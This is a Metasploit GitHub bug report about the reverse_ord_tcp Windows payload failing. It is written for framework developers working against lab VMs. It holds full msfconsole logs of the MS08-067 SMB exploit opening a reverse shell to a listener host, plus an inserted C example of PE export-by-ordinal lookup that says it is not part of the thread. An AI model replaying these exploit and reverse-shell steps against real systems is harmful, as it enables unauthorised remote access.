
windows/*/reverse_ord_tcp does not appear to work? #16642

Open
bwatters-r7 opened this issue Jun 2, 2022 · 3 comments
Labels: bug, confirmed (Issues confirmed by a committer), payload

Comments

@bwatters-r7 (Contributor):

Based on the documentation here: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/windows/shell/reverse_ord_tcp.md
I should be doing this right, but the result is no session and a crashed SMB service:

```
msf6 exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   10.5.132.115     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/shell/reverse_ord_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.5.135.101     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf6 exploit(windows/smb/ms08_067_netapi) > check

[*] 10.5.132.115:445 - Verifying vulnerable status... (path: 0x0000005a)
[+] 10.5.132.115:445 - The target is vulnerable.
msf6 exploit(windows/smb/ms08_067_netapi) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] 10.5.132.115:445 - Automatically detecting the target...
[*] 10.5.132.115:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.5.132.115:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.5.132.115:445 - Attempting to trigger the vulnerability...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.5.132.115
^C[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms08_067_netapi) > check

[-] 10.5.132.115:445 - Connection failed: Rex::ConnectionRefused: The connection was refused by the remote host (10.5.132.115:445).
[*] 10.5.132.115:445 - Cannot reliably check exploitability.
```

Success if I just use reverse_tcp:

```
msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   10.5.132.115     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.5.135.101     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf6 exploit(windows/smb/ms08_067_netapi) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] 10.5.132.115:445 - Automatically detecting the target...
[*] 10.5.132.115:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.5.132.115:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.5.132.115:445 - Attempting to trigger the vulnerability...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.5.132.115
[*] Command shell session 4 opened (10.5.135.101:4444 -> 10.5.132.115:1035) at 2022-06-02 16:21:38 -0500


Shell Banner:
Microsoft Windows XP [Version 5.1.2600]
-----
          

C:\WINDOWS\system32>systeminfo
systeminfo

Host Name:                 A-122D033910404
OS Name:                   Microsoft Windows XP Professional
OS Version:                5.1.2600 Service Pack 3 Build 2600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Uniprocessor Free
Registered Owner:          msfuser
Registered Organization:   a
Product ID:                76487-024-5236883-22685
Original Install Date:     8/30/2019, 3:13:29 AM
System Up Time:            N/A
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 6 Model 85 Stepping 4 GenuineIntel ~3312 Mhz
BIOS Version:              INTEL  - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT-06:00) Central Time (US & Canada)
Total Physical Memory:     255 MB
Available Physical Memory: 152 MB
Virtual Memory: Max Size:  2,048 MB
Virtual Memory: Available: 2,008 MB
Virtual Memory: In Use:    40 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: Q147222
NetWork Card(s):           1 NIC(s) Installed.
                           [01]: AMD PCNET Family PCI Ethernet Adapter
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.5.132.254
                                 IP address(es)
                                 [01]: 10.5.132.115

C:\WINDOWS\system32>
```

I'm not entirely clear on the use case for this payload type; is it just the size?

```
msf6 payload(windows/shell/reverse_ord_tcp) > show options

Module options (payload/windows/shell/reverse_ord_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

msf6 payload(windows/shell/reverse_ord_tcp) > set lhost 127.0.0.1
lhost => 127.0.0.1
msf6 payload(windows/shell/reverse_ord_tcp) > set lport 4567
lport => 4567
msf6 payload(windows/shell/reverse_ord_tcp) > show options

Module options (payload/windows/shell/reverse_ord_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     127.0.0.1        yes       The listen address (an interface may be specified)
   LPORT     4567             yes       The listen port

msf6 payload(windows/shell/reverse_ord_tcp) > generate -f raw -o /dev/null
[*] Writing 93 bytes to /dev/null...
msf6 payload(windows/shell/reverse_ord_tcp) > use payload/windows/shell/reverse_tcp
msf6 payload(windows/shell/reverse_tcp) > set lport 4567
lport => 4567
msf6 payload(windows/shell/reverse_tcp) > set lhost 127.0.0.1
lhost => 127.0.0.1
msf6 payload(windows/shell/reverse_tcp) > generate -f raw -o /dev/null
[*] Writing 296 bytes to /dev/null...
```

@bwatters-r7 bwatters-r7 added the bug label Jun 2, 2022
@bwatters-r7 bwatters-r7 changed the title windows/*/reverse_rd_tcp does not appear to work? windows/*/reverse_ord_tcp does not appear to work? Jun 2, 2022
github-actions bot commented Jul 4, 2022

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here.
If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

@github-actions github-actions bot added the Stale label (Marks an issue as stale, to be closed if no action is taken) Jul 4, 2022

bcoles commented Jul 9, 2022

> [*] 10.5.132.115:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)

That likely isn't going to end well, given that the payload suggests No NX or Win7.

```
'Name' => 'Reverse Ordinal TCP Stager (No NX or Win7)',
```

Although, confusingly, the documentation later uses a Windows XP SP2 target with AlwaysOn NX:

The above commands will result into the following scenario, leading a shell
on the target machine:
```
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] 192.168.56.3:445 - Automatically detecting the target...
[*] 192.168.56.3:445 - Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] 192.168.56.3:445 - Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] 192.168.56.3:445 - Attempting to trigger the vulnerability...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.56.3
[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.3:1034) at 2018-08-17 15:25:02 +0530
```

This payload was designed during the Windows XP SP2 era. Apparently it was a rockin' Windows payload in 2005. Perhaps this stopped working in the Windows XP SP3 / Windows 7 era?

> I'm not entirely clear on the use case for this payload type; is it just the size?

You can find some details in the slides from "Beyond EIP" (pages 14 to 16) presented at BlackHat Briefings by spoonm and skape in 2005.

These payloads use a technique discussed in Oded Horovitz's lightning talk at CanSecWest/core04. I wasn't able to find details about the lightning talk, but Matt Conover and Oded Horovitz presented "Reliably Exploiting Windows Heap Overflows" at core04, so perhaps the technique was discussed during the presentation. Matt and Oded presented a bunch of heap-exploitation-related work for Windows 2000 to Windows XP SP2 in 2004/2005.

As you suggest, the primary benefit is the size due to leveraging in-memory WS2_32.dll. Apparently the technique also works on Windows 9x systems. Static addresses are nice too.
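
An added example, not part of this thread and not Metasploit's code, showing the mechanism the "Reverse Ordinal" stager name refers to: resolving an export from an already-loaded DLL's export directory by ordinal (one subtraction and one index into the address table) instead of by name (a walk of the name table plus an indirection through the name-ordinal table). The export directory layout follows winnt.h; the export set, RVAs and the "rotated" layout are constructed for the example and are not a dump of ws2_32.dll. It also shows the failure mode that an ordinal lookup has and a name lookup does not: against a DLL whose export ordering differs from the one assumed, the same ordinal silently yields a different function.

```c
/*
 * Added example (not Metasploit code): export-by-ordinal versus
 * export-by-name lookup in a PE export directory. The export set below is
 * constructed for the example and is not a dump of any real DLL.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* IMAGE_EXPORT_DIRECTORY as laid out in winnt.h (40 bytes, no padding),
 * declared locally so this builds without the Windows SDK. */
typedef struct {
    uint32_t Characteristics, TimeDateStamp;
    uint16_t MajorVersion, MinorVersion;
    uint32_t Name, Base, NumberOfFunctions, NumberOfNames;
    uint32_t AddressOfFunctions;    /* RVA of uint32_t[NumberOfFunctions]: code RVAs */
    uint32_t AddressOfNames;        /* RVA of uint32_t[NumberOfNames]: name string RVAs */
    uint32_t AddressOfNameOrdinals; /* RVA of uint16_t[NumberOfNames]: unbiased indices */
} export_dir_t;

#define IMAGE_SIZE     1024
#define EXPORT_DIR_RVA 0x100
#define FUNCS_RVA      0x140
#define NAMES_RVA      0x160
#define ORDS_RVA       0x180
#define STRINGS_RVA    0x200

/* Constructed export set; in the unrotated layout name i sits at ordinal i+1. */
static const struct { const char *name; uint32_t rva; } kSample[] = {
    {"accept", 0x1000}, {"bind", 0x2000}, {"closesocket", 0x3000},
    {"connect", 0x4000}, {"getpeername", 0x5000},
};
#define NSAMPLE (sizeof kSample / sizeof kSample[0])

static uint32_t get32(const uint8_t *p) { uint32_t v; memcpy(&v, p, 4); return v; }
static uint16_t get16(const uint8_t *p) { uint16_t v; memcpy(&v, p, 2); return v; }
static void put32(uint8_t *p, uint32_t v) { memcpy(p, &v, 4); }
static void put16(uint8_t *p, uint16_t v) { memcpy(p, &v, 2); }

/* Ordinal lookup: subtract Base, index the address table. No name data is
 * touched, which is the size advantage of an ordinal stager. Returns 0 when
 * the ordinal is outside the table. */
static uint32_t resolve_by_ordinal(const uint8_t *image, uint32_t ordinal) {
    export_dir_t ed;
    memcpy(&ed, image + EXPORT_DIR_RVA, sizeof ed);
    if (ordinal < ed.Base || ordinal - ed.Base >= ed.NumberOfFunctions)
        return 0;
    return get32(image + ed.AddressOfFunctions + 4 * (ordinal - ed.Base));
}

/* Name lookup: walk the name table, map the hit to an address-table index via
 * AddressOfNameOrdinals, then read the RVA. Hash-based stagers do the same
 * walk, comparing a hash of each name instead of the string. */
static uint32_t resolve_by_name(const uint8_t *image, const char *name) {
    export_dir_t ed;
    memcpy(&ed, image + EXPORT_DIR_RVA, sizeof ed);
    for (uint32_t i = 0; i < ed.NumberOfNames; i++) {
        const char *s = (const char *)(image + get32(image + ed.AddressOfNames + 4 * i));
        if (strcmp(s, name) == 0) {
            uint16_t idx = get16(image + ed.AddressOfNameOrdinals + 2 * i);
            return get32(image + ed.AddressOfFunctions + 4 * idx);
        }
    }
    return 0;
}

/* Build the sample export directory into image. With 'rotated' set the same
 * names are exported one ordinal higher (wrapping), standing in for a DLL
 * build whose export ordering differs from the one a stager was written against. */
static void build_sample_image(uint8_t *image, int rotated) {
    export_dir_t ed = {0};
    uint32_t str_rva = STRINGS_RVA;
    memset(image, 0, IMAGE_SIZE);
    ed.Base = 1;
    ed.NumberOfFunctions = ed.NumberOfNames = (uint32_t)NSAMPLE;
    ed.AddressOfFunctions = FUNCS_RVA;
    ed.AddressOfNames = NAMES_RVA;
    ed.AddressOfNameOrdinals = ORDS_RVA;
    memcpy(image + EXPORT_DIR_RVA, &ed, sizeof ed);
    for (uint32_t i = 0; i < NSAMPLE; i++) {
        uint16_t idx = (uint16_t)(rotated ? (i + 1) % NSAMPLE : i);
        put32(image + FUNCS_RVA + 4 * idx, kSample[i].rva);   /* address table slot */
        put32(image + NAMES_RVA + 4 * i, str_rva);             /* name string RVA */
        put16(image + ORDS_RVA + 2 * i, idx);                  /* name -> slot */
        strcpy((char *)image + str_rva, kSample[i].name);
        str_rva += (uint32_t)strlen(kSample[i].name) + 1;
    }
}

/* Wrappers that build the image on the fly, so each call is self-contained. */
static uint32_t lookup_ordinal(int rotated, uint32_t ordinal) {
    uint8_t image[IMAGE_SIZE];
    build_sample_image(image, rotated);
    return resolve_by_ordinal(image, ordinal);
}
static uint32_t lookup_name(int rotated, const char *name) {
    uint8_t image[IMAGE_SIZE];
    build_sample_image(image, rotated);
    return resolve_by_name(image, name);
}

int main(void) {
    for (int rotated = 0; rotated < 2; rotated++)
        printf("%s layout: ordinal 4 -> 0x%x, \"connect\" by name -> 0x%x\n",
               rotated ? "rotated " : "expected", lookup_ordinal(rotated, 4),
               lookup_name(rotated, "connect"));
    return 0;
}
```

Build with any C99 compiler (for example `cc -std=c99 ordinal_lookup.c`). In the expected layout both lookups of "connect" agree; in the rotated layout the name lookup still finds it while ordinal 4 now returns closesocket's RVA, with nothing in the ordinal path able to notice. The example models only the export resolution, not the PEB walk that locates ws2_32.dll in the first place; as bcoles notes, the stager depends on that module already being loaded in the exploited process.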


bcoles commented Jul 9, 2022

For what it is worth, this payload failed on Windows XP SP0 for me too.

```
msf6 > use exploit/windows/smb/ms08_067_netapi 
[*] Using configured payload windows/shell/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows 2003 SP0 Universal
   4   Windows XP SP2 English (AlwaysOn NX)
   5   Windows XP SP2 English (NX)
   6   Windows XP SP3 English (AlwaysOn NX)
   7   Windows XP SP3 English (NX)
[...]


msf6 exploit(windows/smb/ms08_067_netapi) > set target 2
target => 2
msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/shell/reverse_ord_tcp 
payload => windows/shell/reverse_ord_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.200.130 
lhost => 192.168.200.130
msf6 exploit(windows/smb/ms08_067_netapi) > set rhosts 192.168.200.212
rhosts => 192.168.200.212
msf6 exploit(windows/smb/ms08_067_netapi) > check
[+] 192.168.200.212:445 - The target is vulnerable.
msf6 exploit(windows/smb/ms08_067_netapi) > run

[*] Started reverse TCP handler on 192.168.200.130:4444 
[*] 192.168.200.212:445 - Attempting to trigger the vulnerability...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.200.212
[-] Command shell session 1 is not valid and will be closed
[*] 192.168.200.212 - Command shell session 1 closed.


^C[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms08_067_netapi) > set target 0
target => 0
msf6 exploit(windows/smb/ms08_067_netapi) > run

[*] Started reverse TCP handler on 192.168.200.130:4444 
[*] 192.168.200.212:445 - Automatically detecting the target...
[*] 192.168.200.212:445 - Fingerprint: Windows XP - Service Pack 0 / 1 - lang:English
[*] 192.168.200.212:445 - Selected Target: Windows XP SP0/SP1 Universal
[*] 192.168.200.212:445 - Attempting to trigger the vulnerability...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.200.212
[-] Command shell session 2 is not valid and will be closed
[*] 192.168.200.212 - Command shell session 2 closed.
```

@bcoles bcoles added the payload and confirmed (Issues confirmed by a committer) labels and removed the Stale (Marks an issue as stale, to be closed if no action is taken) label Jul 9, 2022